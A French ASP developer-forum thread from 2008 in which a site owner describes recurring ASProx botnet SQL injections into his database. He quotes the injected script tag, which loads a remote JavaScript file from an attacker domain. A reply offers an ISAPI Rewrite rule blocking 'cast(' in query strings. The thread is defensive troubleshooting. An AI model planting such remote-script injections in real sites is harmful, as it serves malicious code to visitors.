begin process at 2010 03 19 21:37:14
  Trouver un code source :
 
dans
 
Accueil > Forum > 

ASP / ASP3

 > 

Système

 > 

Sécurité

 > 

Injection SQL - ASPROX BOTNET


Derniers messages déposésPoser une question dans le forum ou lancer une discussion

Injection SQL - ASPROX BOTNET

lundi 2 juin 2008 à 16:24:32 | Injection SQL - ASPROX BOTNET

tbbuim1

Bonjour à tous,

Comme des millions de serveurs dans le monde, mon serveur est attaqué par des injections de SQL : du style
<script src=http://www.redir94.com/b.js></script>
à l'intérieur de mes champs dans la base de données.

voir
http://www.authsecu.com/news/315-news-securite-entreprise-renouveau-des-attaques-par-injection-sql-selon-ibm.htm
http://www.matchent.com/wpress/?q=node/309
http://www.eweek.com/c/a/Security/Botnet-Installs-SQL-Injection-Tool/

J'ai contrôlé les rq et mis une fonction anti injection pour chaque rq pouvant être attaquées, mais rien n'y fait. fonction : Fn_NoSqlInject

j'ai fait la recherche du trojan msscntr32.exe mais je ne l'ai pas trouvé.

Bref, mon site est continuellement attaqué et j'ai beau enlever les lignes de la table qui sont infectées, elles se réinfectent tous les jours.

Quelqu'un a une idée?

Merci pour votre aide

TBBUIM
mercredi 11 juin 2008 à 10:16:46 | Re : Injection SQL - ASPROX BOTNET

TompouceTN

Bonjour,

J'ai eu le même soucis pendant quelques jours.
Pour me débarrasser des attaques, j'ai utilisé une règle de réécriture (avec ISAPI Rewrite), demandant de stopper le chargement de la page si on détecte "cast(" dans le querystring.
RewriteRule .*CAST\(.* . [F,I]
Depuis, plus de soucis.

Cela n'empèche pas de sécuriser au maximum les requètes. Chez moi aussi, il  y avait du boulot... certaines pages étant écrites depuis presque 10 ans... !

Bon courage
Tom


Cette discussion est classée dans : sql, www, injection, botnet, com


Répondre à ce message

Sujets en rapport avec ce message

Url rewriting [ par hudon77 ] Bonjour à tous! Dans mon site je veux donner un URL unique a chaque utilisateur. ex: www.monsite.com/Nathalie, www.monsite.com/Roger J'ai exploré oracle_forms builder_pl/sql [ par maymdeini ] bonjour j'ai besion d' un exemple bien clair de oracle-forms builder -pl/sql parceque j' entraint de developper un projet sous oracle-forms builder-pl Update table sql dans page .aspx [ par hugo7 ] Bonjour je voudrais savoir comment mettre à jour une table d'une de mes bases de donnée directement dans ma page aspx avec une condition : Dans ma ta ajouter un enregistrement dand une base de données sql [ par miss0005 ] bonsoir a tous [^^happy13] Je suis débutante en windev et je voudrais bien une aide pour mon projet. En effet, je veux ajouter a ma base de données sq Formulaire actualisation asp-sql server [ par loic2810 ] Bonjour, Je travaille sous ASP avec une base SQL SERVER. Quand je crée un formulaire d'acualisation asp tous les champs à actualiser sont remplis par Probleme SQL [ par yoyo ] Mon pb ne concerne pas directement ASP mais je suppose queqq'un pourra m'aider.La requete suivante est executee sur un serveur SQLServer 7.SELECT * FR Probleme avec SQL SERVER [ par valou ] salut,j'ai un probleme pour une requete en asp sur sql server.voici mon code:Set conn = Server.CreateObject("ADODB.Connection")connstring = "driver={S SQL SERVER 2000 ???? connection [ par Troyan ] j'ai toujours systematiquement la meme erreur.cela doit etre un parametrage de SQL2K mais j'ai pas trouvé !!Help Échec de la connexion de l'utilisateu SQL Requete [ par ZL ] j'ai une table, nommée T1 qui contient 5 enregistrements,par exemple,1,2,3,4,5;j'ai une autre table,nommée T2 qui contient 2 enregistrements,par exemp Transfert de donnees entre 2 BD SQL Server 2000! [ par ludo ] Bonjour, j ai un leger pb!Voila j ai deux bases de donnees SQL server 2000. Je veux recuperer certaines donnees d une ou +sieur tables d une BD et les


Nos sponsors


Sondage...

Comparez les prix

CalendriCode

Mars 2010
LMMJVSD
1234567
891011121314
15161718192021
22232425262728
293031    

Consulter la suite du CalendriCode

Photothèque

 
Développement réalisé par Nicolas SOREL (Nix) avec l'aide de : Cyril DURAND et Emmanuel (EBArtSoft), Merci à Vincent pour ses précieux conseils.
CodeS-SourceS.com© Toute reproduction même partielle est interdite sauf accord écrit du Webmaster
CodeS-SourceS.com© est une marque déposée tous droits réservés

Google Coop CodeS-SourceS Google Coop CodeS-SourceS
Temps d'éxécution de la page : 0,468 sec (3)

Nous contacter | Annoncer sur CodeS-SourceS | Mentions légales